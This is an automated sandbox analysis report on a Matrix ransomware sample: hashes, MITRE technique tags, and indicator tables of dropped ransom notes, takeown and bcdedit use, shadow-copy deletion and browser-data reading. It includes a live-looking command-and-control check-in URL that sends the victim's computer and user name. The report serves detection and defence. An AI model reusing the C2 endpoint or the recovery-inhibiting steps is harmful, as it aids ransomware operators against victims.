matrix | 2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac

Analysis

max time kernel
4294181s
max time network
123s
platform
windows7_x64
resource
win7-20220223-en
submitted
05-03-2022 16:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
Size

1.5MB
MD5

7b5d977cef12c94558a3ef7dcc44396b
SHA1

c00a63341b6516680b31d0b6673c8e52dcc99c8d
SHA256

2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac
SHA512

6a62813ca7c0c53a917b8e345505978e23c17bf8fadea512bb9b13d78ccde8ccb81e92d5dce14ab40941d0fecec95946b57314ab5541f732ac8d532b6e60b691

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer suricata upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	flow	ioc	Process
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Mozilla Firefox\fonts\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\ProgramData\Adobe\Updater6\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Users\Admin\Links\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Microsoft Games\More Games\en-US\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\bin\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Microsoft Games\More Games\de-DE\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Microsoft Games\Purble Place\fr-FR\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\VideoLAN\VLC\lua\sd\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Microsoft Games\Purble Place\ja-JP\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jre7\lib\zi\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jre7\lib\zi\Australia\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Microsoft Games\Chess\es-ES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Microsoft Games\Purble Place\es-ES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\VideoLAN\VLC\lua\http\requests\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Users\Admin\Favorites\Links\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Users\Admin\Documents\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\1033\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Microsoft Games\Solitaire\es-ES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Microsoft Games\More Games\fr-FR\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Google\Chrome\Application\SetupMetrics\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jre7\lib\zi\Pacific\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Microsoft Games\Chess\de-DE\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Microsoft Games\More Games\it-IT\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
HTTP URL	3	http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=GZAATBZA\|Admin&sid=PhUW1STzdI4JSB49&phase=START	Process not Found
File created		C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\Microsoft Games\Chess\en-US\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created		C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe

suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1584	bcdedit.exe
1764	bcdedit.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
9	872	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	HE0Qzozz64.exe

Executes dropped EXE 64 IoCs

pid	Process
1088	NWty7y0v.exe
964	HE0Qzozz.exe
1692	HE0Qzozz64.exe
1948	HE0Qzozz.exe
1720	HE0Qzozz.exe
1224	HE0Qzozz.exe
888	HE0Qzozz.exe
752	HE0Qzozz.exe
1560	HE0Qzozz.exe
620	HE0Qzozz.exe
1704	HE0Qzozz.exe
1724	HE0Qzozz.exe
1224	HE0Qzozz.exe
1728	HE0Qzozz.exe
2024	HE0Qzozz.exe
1012	HE0Qzozz.exe
1800	HE0Qzozz.exe
2004	HE0Qzozz.exe
1492	HE0Qzozz.exe
1688	HE0Qzozz.exe
1456	HE0Qzozz.exe
1576	HE0Qzozz.exe
1780	HE0Qzozz.exe
1192	HE0Qzozz.exe
1284	HE0Qzozz.exe
1800	HE0Qzozz.exe
1808	HE0Qzozz.exe
1316	HE0Qzozz.exe
1428	HE0Qzozz.exe
1864	HE0Qzozz.exe
1800	HE0Qzozz.exe
620	HE0Qzozz.exe
1188	HE0Qzozz.exe
1284	HE0Qzozz.exe
1428	HE0Qzozz.exe
1240	HE0Qzozz.exe
1548	HE0Qzozz.exe
620	HE0Qzozz.exe
656	HE0Qzozz.exe
1424	HE0Qzozz.exe
1940	HE0Qzozz.exe
2028	HE0Qzozz.exe
1328	HE0Qzozz.exe
1696	HE0Qzozz.exe
1876	HE0Qzozz.exe
1944	HE0Qzozz.exe
1400	HE0Qzozz.exe
1364	HE0Qzozz.exe
2028	HE0Qzozz.exe
1700	HE0Qzozz.exe
1696	HE0Qzozz.exe
1012	HE0Qzozz.exe
1944	HE0Qzozz.exe
1704	HE0Qzozz.exe
1480	HE0Qzozz.exe
1436	HE0Qzozz.exe
612	HE0Qzozz.exe
1264	HE0Qzozz.exe
836	HE0Qzozz.exe
216	HE0Qzozz.exe
1800	HE0Qzozz.exe
1300	HE0Qzozz.exe
1940	HE0Qzozz.exe
2004	HE0Qzozz.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 54 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000132f5-71.dat	upx
behavioral1/files/0x00070000000132f5-70.dat	upx
behavioral1/files/0x00070000000132f5-72.dat	upx
behavioral1/files/0x00070000000132f5-76.dat	upx
behavioral1/files/0x00070000000132f5-77.dat	upx
behavioral1/files/0x00070000000132f5-80.dat	upx
behavioral1/files/0x00070000000132f5-79.dat	upx
behavioral1/files/0x00070000000132f5-83.dat	upx
behavioral1/files/0x00070000000132f5-82.dat	upx
behavioral1/files/0x00070000000132f5-85.dat	upx
behavioral1/files/0x00070000000132f5-86.dat	upx
behavioral1/files/0x00070000000132f5-89.dat	upx
behavioral1/files/0x00070000000132f5-88.dat	upx
behavioral1/files/0x00070000000132f5-92.dat	upx
behavioral1/files/0x00070000000132f5-91.dat	upx
behavioral1/files/0x00070000000132f5-94.dat	upx
behavioral1/files/0x00070000000132f5-95.dat	upx
behavioral1/files/0x00070000000132f5-97.dat	upx
behavioral1/files/0x00070000000132f5-98.dat	upx
behavioral1/files/0x00070000000132f5-102.dat	upx
behavioral1/files/0x00070000000132f5-101.dat	upx
behavioral1/files/0x00070000000132f5-104.dat	upx
behavioral1/files/0x00070000000132f5-105.dat	upx
behavioral1/files/0x00070000000132f5-108.dat	upx
behavioral1/files/0x00070000000132f5-107.dat	upx
behavioral1/files/0x00070000000132f5-110.dat	upx
behavioral1/files/0x00070000000132f5-111.dat	upx
behavioral1/files/0x00070000000132f5-113.dat	upx
behavioral1/files/0x00070000000132f5-114.dat	upx
behavioral1/files/0x00070000000132f5-116.dat	upx
behavioral1/files/0x00070000000132f5-117.dat	upx
behavioral1/files/0x00070000000132f5-119.dat	upx
behavioral1/files/0x00070000000132f5-120.dat	upx
behavioral1/files/0x00070000000132f5-122.dat	upx
behavioral1/files/0x00070000000132f5-123.dat	upx
behavioral1/files/0x00070000000132f5-125.dat	upx
behavioral1/files/0x00070000000132f5-126.dat	upx
behavioral1/files/0x00070000000132f5-128.dat	upx
behavioral1/files/0x00070000000132f5-129.dat	upx
behavioral1/files/0x00070000000132f5-131.dat	upx
behavioral1/files/0x00070000000132f5-132.dat	upx
behavioral1/files/0x00070000000132f5-134.dat	upx
behavioral1/files/0x00070000000132f5-135.dat	upx
behavioral1/files/0x00070000000132f5-138.dat	upx
behavioral1/files/0x00070000000132f5-137.dat	upx
behavioral1/files/0x00070000000132f5-139.dat	upx
behavioral1/files/0x00070000000132f5-140.dat	upx
behavioral1/files/0x00070000000132f5-142.dat	upx
behavioral1/files/0x00070000000132f5-143.dat	upx
behavioral1/files/0x00070000000132f5-145.dat	upx
behavioral1/files/0x00070000000132f5-146.dat	upx
behavioral1/files/0x00070000000132f5-148.dat	upx
behavioral1/files/0x00070000000132f5-149.dat	upx
behavioral1/files/0x00070000000132f5-151.dat	upx

Loads dropped DLL 64 IoCs

pid	Process
1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
780	cmd.exe
964	HE0Qzozz.exe
1240	cmd.exe
1432	cmd.exe
1584	cmd.exe
1572	cmd.exe
1520	cmd.exe
560	cmd.exe
1244	cmd.exe
1048	cmd.exe
796	cmd.exe
1948	cmd.exe
1492	cmd.exe
656	cmd.exe
1436	cmd.exe
1704	cmd.exe
1696	cmd.exe
1584	cmd.exe
2012	cmd.exe
1716	cmd.exe
1532	cmd.exe
1012	cmd.exe
1224	cmd.exe
2004	cmd.exe
1548	cmd.exe
2012	cmd.exe
1584	cmd.exe
2020	cmd.exe
1704	cmd.exe
1876	cmd.exe
752	cmd.exe
1576	cmd.exe
1496	cmd.exe
1244	cmd.exe
528	cmd.exe
1728	cmd.exe
1700	cmd.exe
612	cmd.exe
1284	cmd.exe
1576	cmd.exe
1728	cmd.exe
1752	cmd.exe
656	cmd.exe
2012	cmd.exe
1424	cmd.exe
1968	cmd.exe
1764	cmd.exe
1936	cmd.exe
1188	cmd.exe
1492	cmd.exe
1048	cmd.exe
208	cmd.exe
2024	cmd.exe
1940	cmd.exe
1716	cmd.exe
1764	cmd.exe
828	cmd.exe
1700	cmd.exe
1932	cmd.exe
1012	cmd.exe
1364	cmd.exe
1704	cmd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1548	takeown.exe
204	takeown.exe
1700	takeown.exe
1808	Process not Found
1944	Process not Found
1584	takeown.exe
620	takeown.exe
528	takeown.exe
1532	takeown.exe
1316	takeown.exe
1364	takeown.exe
1192	takeown.exe
1704	takeown.exe
1948	takeown.exe
1912	Process not Found
528	takeown.exe
796	takeown.exe
1864	takeown.exe
752	takeown.exe
1876	takeown.exe
1864	takeown.exe
1524	takeown.exe
612	takeown.exe
1572	takeown.exe
1492	takeown.exe
1876	takeown.exe
1012	takeown.exe
1800	takeown.exe
1876	Process not Found
1704	takeown.exe
2004	takeown.exe
1716	takeown.exe
2044	takeown.exe
1752	takeown.exe
2024	takeown.exe
1436	takeown.exe
528	takeown.exe
928	takeown.exe
796	takeown.exe
1244	takeown.exe
1696	takeown.exe
1472	takeown.exe
1224	takeown.exe
1012	Process not Found
1984	takeown.exe
212	takeown.exe
1264	takeown.exe
1428	takeown.exe
1080	takeown.exe
1864	takeown.exe
1428	takeown.exe
1364	takeown.exe
1520	takeown.exe
1584	takeown.exe
1548	takeown.exe
1480	takeown.exe
1864	takeown.exe
208	takeown.exe
1936	takeown.exe
896	takeown.exe
212	takeown.exe
2004	takeown.exe
1280	takeown.exe
212	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 40 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\72C1GWO9\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\M7YMRK48\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AZW6OKHO\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AGWPI80M\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\X:	HE0Qzozz64.exe
File opened (read-only)	\??\T:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\J:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\E:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\P:	HE0Qzozz64.exe
File opened (read-only)	\??\L:	HE0Qzozz64.exe
File opened (read-only)	\??\R:	HE0Qzozz64.exe
File opened (read-only)	\??\Y:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\W:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
